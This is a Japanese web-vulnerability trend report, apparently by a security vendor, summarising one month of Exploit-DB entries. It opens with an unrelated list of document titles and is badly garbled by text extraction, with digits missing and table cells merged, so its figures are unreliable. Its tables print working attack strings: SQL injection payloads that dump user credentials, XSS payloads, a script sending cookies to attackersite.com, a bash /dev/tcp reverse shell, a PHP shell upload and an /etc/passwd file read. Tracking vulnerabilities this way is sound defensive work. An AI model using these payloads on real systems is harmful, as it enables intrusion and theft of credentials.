サマリー EDB-Report 最新 Web トレンドレポート (06.0) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチー

Similar documents
最新 Web トレンドレポート (06.04) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4

サマリー EDB-Report ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 8 月に公開された Exploit-DB の分析結果 Cross Site Scripting の攻撃に対する脆弱性報告件数が最も多かったです 発見された Cross Site

EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 05

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06

最新 Web 脆弱性トレンドレポート (05.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム

最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 08 年



最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (207.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センタ

最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 07 年 月に公開さ

EDB-Report 最新Web脆弱性トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB( ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 5

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

itechclassifieds Middle School Horizon QCMS myseatxt 0.34 Joomla JV Comment PizzaInn_Project XOS Simple e-document Taboada Macronews godontologico 5 E

96 8 PHPlot 1. ( 8.1) 4 1: // 2: // $_SERVER[ HTTP_REFERER ]... 3: // $_SERVER[ HTTP_USER_AGENT ]... 4: // $_SERVER[ REMOTE_ADDR ]... ( ) 5: // $_SERV

Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved.

EDB-Report 最新Web脆弱性トレンドレポート(07.) 07..0~07.. Exploit-DB( ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 0

5-5_arai_JPNICSecSemi_XssCsrf_CM_ PDF

第3回_416.ppt

2

Microsoft PowerPoint - webapp.ppt [互換モード]

Q-...g.L..465

02

MENU 키를 누르면 아래의 화면이 나타납니다

2

TheRecordx.indd

NetIQ White Paper

PowerPoint Presentation

<Documents Title Here>

BN44.indd

Windows Oracle -Web - Copyright Oracle Corporation Japan, All rights reserved.

…j…–†[…\…t…B…A10„”…„…C…A…E…g

…j…–†[…\…t…B…A-1’Ü


Web XXX.XXX.XXX.XXX - - [02/May/2010:12:52: ] "GET /url/url2/page2.htm HTTP/1.1" " "(compatibl

TheRecord.indd


TheRecord.indd

VMware View Persona Management

Drive-by-Download攻撃における通信の 定性的特徴とその遷移を捉えた検知方式



病医院における税務調査のポイント


全社一丸で業績目標を達成する!高収益企業が取り組む業績管理体制


お客様の心をつかむ営業活動のセオリーと実践法

歯科医院サクセスフル・マーケティング ~「自分流」を確立して動く

「選ばれる歯科医院」を目指して 歯科医院経営改善のポイント

トップ営業マンに学ぶ営業テクニック

クリニックの新規開業を成功させるプロセスと留意点


BN46.indd

別紙 年第 3 四半期脆弱性対策情報データベース JVN ipedia の登録状況 ( 詳細 ) 1. 脆弱性対策情報の登録状況 年第 3 四半期に登録した脆弱性の種類別件数図 8 のグラフは JVN ipedia へ 2012 年第 3 四半期に登録した脆弱性対策情

2011 年第 3 四半期脆弱性対策情報データベース JVN ipedia の登録状況 ( 詳細 ) 1. 脆弱性対策情報の登録状況 1.1 今四半期に登録した脆弱性の種類別件数 す 別紙 2 共通脆弱性タイプ一覧 CWE ( *12) は 脆弱性の種類を識別するための共通の脆弱性タイプの一覧で C

BN41.indd

Flash Player ローカル設定マネージャー

com.ibm.etools.egl.jsfsearch.tutorial.doc.ps

健康文化44

自己紹介 はせがわようすけ ネットエージェント株式会社 株式会社セキュアスカイ テクノロジー技術顧問 Microsoft MVP for Consumer Security Oct

BN43.indd

([ ],), : [Name], name1 name2 name10 4, 2 SuperSQL, ([ ]!), name1 name2 : [Name]! name SuperSQL,,,,,,, < < > } =,

untitled

hands_on_4.PDF

Lotus Domino XML活用の基礎!

untitled

wide94.dvi

untitled

BN33.indd

タイトルを1~2行で入力 (長文の場合はフォントサイズを縮小)

~ アドレス収集くん ~ セキュリティ対策御説明資料

pressrelease0806


モデムおよびネットワーク接続ガイド

SiteLock操作マニュアル

1


TheRecordx.indd

Teradici Corporation # Canada Way, Burnaby, BC V5G 4X8 Canada p f Teradici Corporation Teradi

TheRecordx.indd

SQLインジェクション・ワームに関する現状と推奨する対策案

SOC Report

Drive-by Download 攻撃に おけるRIG Exploit Kitの 解析回避手法の調査

_‚Ofl¼

実施していただく前に

nopcommerce Adobe Flash ( 1 ) 1 nopcommerce 2.2 ( [5, p.3-4] )

セキュリティの話は退屈? 同じ話ばっかりで聞き飽きた! 本当に問題なところはどこ? 今日の題材 :sourceforge.net の PHP で作成されたアプリケーション TOP50 の危険なコードを検索 & 解説 セキュリティ対策に魔法の杖は無い! アーキテクト プログラマ が安全な設計 コーディ

Microsoft Azure Microsoft Corporation Global Blackbelt Sales Japan OSS TSP Rio Fujita

第 7 回の内容 動的な Web サイト フォーム Web システムの構成

Management 2

Oracle Change Management Pack, Oracle Diagnostics Pack, Oracle Tuning Packインストレーション・ガイド リリース2.2

レポート属性

untitled


WIDE 1

Oracle Web Conferencing Oracle Collaboration Suite 2 (9.0.4) Creation Date: May 14, 2003 Last Update: Jan 21, 2005 Version: 1.21

BN36.indd

25 About what prevent spoofing of misusing a session information

Oracle Fail Safe For Windows NT and Windows 2000 リリース・ノート、リリース 3.1.2

Transcription:

06.0

サマリー EDB-Report 最新 Web トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 0 月に公開された Exploit-DB の分析結果 SQL インジェクション攻撃に対する脆弱報告件数が最も多く 攻撃の種類も多数発見されました SQL インジェクション攻撃は 最初は難易度が低い攻撃としても 一応が発見されたら そのを悪用して多様な攻撃ができる非常に高い危険度を持っている攻撃に属します SQL インジェクションにさらされないためには 入力値の検証を厳密に実施するセキュアコーディングが必須的に求められます 主なソフトウェアの発生現況を見ると 0 月には CMS から スクリプトまで多様なソフトウェアからが発見されました が発見されたソフトウェアを使用する管理者は 該当の内容を必ず確認し 関連アップデートを実施してにさらされないように注意しなければなりません. 別件数 カテゴリ 件数 ファイルアップロード (File Upload) ローカルファイル挿入 (Local File Inclusion:LFI) リモートコマンドインジェクション (Remote Command Execution) SQL インジェクション (SQL Injection) 3 クロスサイトスクリプティング (Cross Site ing : XSS) 合計 48 5 0 5 0 5 0 ファイルアップロード (File Upload) 別件数 3 ローカルファイル挿入リモートコマンドインジェクション SQL インジェクション (Local File Inclusion:LFI) (Remote Command (SQL Injection) クロスサイトスクリプティング (Cross Site ing : Execution) XSS). 危険度別件数 危険度 件数 割合 早急対応要 5 0.4% 高 43 89.58% 合計 48 00.00% 危険度別件数 43 5 早急対応要 高 3. 攻撃実行の難易度別件数難易度 件数 割合 難 4 8.33% 中 9 8.75% 易 35 7.9% 合計 48 00.00% 攻撃実行の難易度別件数 4 9 35 難 中 易 4. 主なソフトウェア別発生件数 ソフトウェア名 件数 PPS-0-S Q3V 4 Image Business Blog Rental Dynamic Web Picosafe Entrepreneur Job Portal Thatware Event Calendar Press Release Fashion School Full CBT FreePBX Application Health Record Witbe Ap MicroBlog Categorizator JonhCMS Rental Ap MicroCMS S9Y Serendipity CNDSOFT Learning Management Forum XhP CMS Student Information Advance MLM Web Based Alumni Tracking OpenCimetiere Colorful Blog BB Portal miniblog MLM Unilevel Plan 合計 48 主なソフトウェア別発生件数 4 PPS-0-S Q3V Image Business Blog Rental Dynamic Web

最新 Web トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 日付 EDB 番号 カテゴリ 攻撃難度 危険度 名 攻撃コード 対象プログラム 対象環境 /picosafe_webgui/webinterface/js/filemanager/filemanage 06-0-05 40454 XSS 中 高 Picosafe Web Gui - r.php?directory=phnjcmlwdd5hbgvydcgxkts8l3njcmlwd Picosafe Web Picosafe filemanager.php XSS D4= Gui 06-0-06 40468 SQL Injection 易 高 06-0-06 40467 SQL Injection 易 高 06-0-06 40466 SQL Injection 中 高 06-0-06 40470 SQL Injection 易 高 06-0-06 40469 SQL Injection 難 早急対応要 /advancedbb/viewproduct.php?pid=94%7%0and%0754=754%0 BB Portal - viewproduct.php SQL Injection 脆弱 AND%0%7whqn%7=%7whqn 性 Rental - Blind SQL Injection Advance MLM - SQL Injection - restaurants-details.php SQL Injection MLM Unilevel Plan v.0. - news_detail.php SQL Injection /product_details.php?refid=395887%7%0and% 039=39%0AND%0%7HTMi%7=%7HTMi /mlm/news_detail.php?newid=jmctrq%7%0union% 0ALL%0SELECT%0NULL,CONCAT(0x7787a7a7,0x4 8755657878776796667664866474474844b655 564f54370537747504c6e73687666550,0x7787877 ),NULL,NULL,NULL,NULL--%0Afye /jus/restaurants-details.php?fid=%0and%0=-- /news_detail.php?newid=%7%0%f*%30000an d%0ascii%8substring%8%8database%8%9%9 %C4%C%9%9%3C5%0and*%F%0%7x %7%3D%7x BB Portal Rental Advance MLM Just Dial Clone MLM Unilevel Plan BB Portal Rental Advance MLM MLM Unilevel Plan v.0. 06-0-06 4046 Remote Command Execution 中早急対応要 Witbe - Remote Code Execution POST /cgi-bin/applyconfig.pl HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Witbe Witbe file=set bash -i >& /dev/tcp/ 0>& 06-0-06 40470 XSS 易高 06-0-07 40479 SQL Injection 難早急対応要 - /jus/restaurants-details.php?fid=<script>alert();</script> restaurants-details.php XXS /job-portal/jobsearch_all.html?cmpid=345355536' AND (SELECT 8347 FROM(SELECT Entrepreneur Job Portal - COUNT(*),CONCAT(0x76a7a7a7,(SELECT jobsearch_all.html SQL Injection (ELT(8347=8347,))),0x77876b7,FLOOR(RAND(0)*)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tqjf'='tqjf Just Dial Clone Entrepreneur Job Portal Entrepreneur Job Portal 06-0-09 40480 XSS 中高 miniblog.0. - admin.php XSS POST /miniblog/adm/admin.php?mode=add&id=%3cbr%0/% 3E%3Cb%3ENotice%3C/b%3E:%0%0Undefined%0 variable:%0post%0in%0%3cb%3ec:\\\\xampp \\\\htdocs\\\\miniblog\\\\adm\\\\edit.p hp%3c/b%3e%0on%0line%0%3cb%3e8%3c/b% 3E%3Cbr%0/%3E HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 miniblog miniblog.0. data[post_title]=<script>location.href = â http://www.attackersite.com/stealer.php?cookie=â +document.cookie;</script> 06-0-09 40487 XSS 易高 Press Release - administration.php XSS /phppressrelease/administration.php?pageaction=saverele ase&subaction=submit&dateday=&datemonthnewedit=&d ateyearnewedit=&title=<script>alert('exploit- DB')<%Fscript>&summary=deneme&releasebody=denem e&categorynewedit=&publish=active Press Release Press Release 06-0- 40505 XSS 易高 06-0- 4053 SQL Injection 易高 Ap MicroBlog.0. - index.php XSS OpenCimetiere v3.0.0-a5 - login.php SQL Injection POST /index.php?page=posts&post_id= HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 task=publish_comment&article_id=69&user_id=&commen t_user_name=<script>alert(7);</script>&comment_user_e mail=besimweptest@yopmail.com&comment_text=besim& captcha_code=dkf8&btnsubmitpc=publish your comment POST / HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 login.action.connect=se%0connecter&came_from=&logi n=%0and%0=--&password=passw0rd Ap MicroBlog OpenCimetier e Ap MicroBlog.0. OpenCimetier e v3.0.0-a5

最新 Web トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 日付 EDB 番号 カテゴリ 攻撃難度 危険度 名 攻撃コード 対象プログラム 対象環境 POST /index.php?page=posts&post_id= HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 06-0- 4056 XSS 易 高 Ap MicroCMS 3.9.5 - Chrome/6.0.9.75 Safari/535.7 Ap Ap index.php XSS MicroCMS MicroCMS 3.9.5 comment_user_name=<svg/onload=prompt(7);//> 06-0- 405 SQL Injection 易高 06-0-3 4056 XSS 易高 Categorizator 0.3. - vote.php SQL Injection Colorful Blog - single.php XSS /cms/categorizator/vote.php?id_site='%0and%0''=' ' Categorizator POST /single.php?kat=kat&url='post_name' HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Colorful Blog Categorizator 0.3. Colorful Blog adsoyad=<script>alert('document.cookie')</script>&email= besim@yopmail.com&web=example.com&mesaj=nice, blog post 06-0-3 4059 SQL Injection 易高 06-0-3 4058 XSS 易高 Blog.0 - /blog/admin.php?act=editpost&id='+order+by+999--+ admin.php SQL Injection Blog.0 - Multiple Vulnerabilities POST /blog/admin.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Blog Blog Blog.0 Blog.0 06-0-3 40530 SQL Injection 易 高 06-0-3 405 SQL Injection 易 高 06-0-4 4053 SQL Injection 易 高 06-0-4 40547 SQL Injection 易 高 act= addpost&publish_date=06-0-3 0:30:7&post_title=<script>alert('XssPoC')</script>&post _text=hacked&post_limit=550 JonhCMS 4.5. - go.php SQL /go.php?id=%0and%0=-- Injection Thatware 0.4.6 - friend.php SQL /friend.php?sid=%0and%0=-- Injection Forum.4 - /admin.php?act=editpost&id='+order+by+999--+ admin.php SQL Injection POST /signin.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Health Record 0. - Chrome/6.0.9.75 Safari/535.7 signin.php SQL Injection JonhCMS Thatware Forum Health Record JonhCMS 4.5. Thatware 0.4.6 Forum.4 Health Record 0. 06-0-4 40546 SQL Injection 中高 06-0-4 40545 SQL Injection 易高 Fashion 0. - dd.php SQL Injection Learning Management 0. - login.php SQL Injection lgaid=admin' or ''=' /admin/dd.php?q=- %7%0union%0select%0,version()--+ POST /admin/login.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 username=admin' or ''=' Fashion Fashion 0. Learning Management Learning Management 0. 06-0-4 40544 SQL Injection 中高 06-0-4 40543 SQL Injection 中高 06-0-4 4054 SQL Injection 易高 Dynamic Web 0. - page.php SQL Injection Web Based Alumni Tracking 0. - print_employed.php SQL Injection /page.php?prodid=- 3%7%0union%0select%0,,@@version,4--+ /admin/print_employed.php?id=- %7%0union%0select%0,concat(username,0x3a, password),3,4,5,6,7,8,9,0,,%0from%0user--+ POST /admin_login.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Student Information Chrome/6.0.9.75 Safari/535.7 (SIS) 0. - admin_login.php SQL Injection Dynamic Web Web Based Alumni Tracking Student Information Dynamic Web 0. Web Based Alumni Tracking 0. Student Information (SIS) 0. username=admin' or ''=' 06-0-6 4055 XSS 易高 06-0-6 4055 XSS 易高 06-0-7 40559 XSS 易高 - index.php XSS - administration.php XSS Business - index.php XSS /index.php?key=<svg/onload=alert()> /administration.php?key=<svg/onload=alert()> /index.php?key=<svg/onload=alert()>&location=<svg/onl oad=alert()> Business Business

最新 Web トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 日付 EDB 番号 カテゴリ 攻撃難度 危険度 名 攻撃コード 対象プログラム 対象環境 /show.php?show=- %0union%0select%0,username,password,4,5,6,7, 06-0-7 40558 SQL Injection 中 高 School Full CBT 0. - show.php 8,9,0,,,3,4,5,6,7,8,9,0,,,3,4,5,6 School Full School Full SQL Injection,7,8,user(),database(),3,3%0from%0adminlogin-- CBT CBT 0. + 06-0-7 40555 SQL Injection 難 早急対応要 06-0-7 40554 XSS 易 高 06-0-7 40554 XSS 易 高 06-0-7 40559 XSS 易 高 06-0-9 40576 XSS 中 高 /shop/product-details.php?prodid=- 80%7%0union%0select%0,,concat(username,0x Application 0. - productdetails.php SQL Injection 3a,password),4,version(),user()%0from%0user--+ Image - index.php XSS Image - administration.php XSS Business - administration.php XSS XhP CMS 0.5. - action.php XSS /index.php?dateyear=<svg/onload=alert()>&key=<svg/onl oad=alert()> /administration.php?dateyear=<svg/onload=alert()>&key =<svg/onload=alert()> /administration.php?key=<svg/onload=alert()>&location= <svg/onload=alert()> POST /action.php?module=users&action=process_general_confi g&box_id=9&page_id=0&basename=index.php&closewi ndow=&from_page=page=0&box_id=9&action=display_ site_settings&errcode=0 HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Application Image Image Business XhP CMS Application 0. Image Image Business XhP CMS 0.5. frmpagetitle="accesskey&#6;z&#3;onclick&#6;"alert& #40;document.domain&#4; 06-0-9 40575 File Upload 易高 CNDSOFT.3 - index.php File Upload POST /ofis/index.php?is=kullanici_tanimla HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/octet-stream CNDSOFT CNDSOFT.3 06-0-0 40594 SQL Injection 易高 06-0-0 4059 SQL Injection 難早急対応要 <? phpinfo();?> -----------------------------7dd009908f-- /admin.php?act=options&cal_id='+order+by+0--+ Event Calendar.5 - admin.php SQL Injection Rental - viewproducts.php SQL Injection /viewproducts.php?catid=- 9700%7%0OR%0%0GROUP%0BY%0CONCAT (0x77a6707,(SELECT%0(CASE%0WHEN%0(7055 =7055)%0THEN%0%0ELSE%00%0END)),0x76 a76787,floor(rand(0)*))%0having%0min(0)# Event Calendar Rental Event Calendar.5 Rental 06-0- 406 SQL Injection 易高 06-0- 4064 LFI 易高 - categoryview-list.php SQL Injection 脆弱 /category-view-list.php?srch=%0and%0=-- 性 FreePBX 0.3.66 - ajax.php LFI POST /admin/ajax.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 destination=/../../../../../../var/www/html/0x448.php&lan guage= Just Dial Clone FreePBX FreePBX 0.3.66 06-0-3 4060 XSS 易高 07 - form_process.php XSS POST /zenbership/pp-functions/form_process.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 07 page=&session=zen_076e737b450bbd83f5fc066&first _name=besim&last_name=<>alert('exploitdb')</scrip t>&email=exploit@yopmail.com 06-0-3 4060 XSS 易高 07 - event-add.php XSS POST /admin/cp-functions/event-add.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 07 event[name]=<>alert('meryem-exploitdb');</>

最新 Web トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 日付 EDB 番号 カテゴリ 攻撃難度 危険度 名 攻撃コード 対象プログラム 対象環境 POST /FWUpgrade.php HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f 06-0-8 4064 XSS 易高 PPS-0-S Q3V - FWUpgrade.php XSS -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="somefile.php<img src=x onerror=confirm()>" Content-Type: text/php PPS-0-S Q3V PPS-0-S Q3V t00t -----------------------------7dd009908f-- 06-0-8 4064 XSS 易 高 06-0-8 4064 XSS 易 高 PPS-0-S Q3V - SensorDetails.php XSS PPS-0-S Q3V - SNMP.php XSS /SensorDetails.php?Menu=SST&DeviceID=C00"><script>a lert()</script> POST /SNMP.php?Menu=SMP HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 PPS-0-S Q3V PPS-0-S Q3V PPS-0-S Q3V PPS-0-S Q3V SNMPAgent=Enable&CommuintyString=public&Commuint ywrite=private&trapsversion=vtrap&ip=9.68.0.54'; alert(3) 06-0-8 4064 LFI 易 高 06-0-3 40650 XSS 易 高 PPS-0-S Q3V - ListFile.php LFI /ListFile.php?file=../../../../../../../etc/passwd POST /serendipity_admin.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 S9Y Serendipity.0.4 - Chrome/6.0.9.75 Safari/535.7 serendipity_admin.php XSS 脆弱 性 PPS-0-S Q3V S9Y Serendipity PPS-0-S Q3V S9Y Serendipity.0.4 serendipity[body]=<>alert('meryem ExploitDB')</>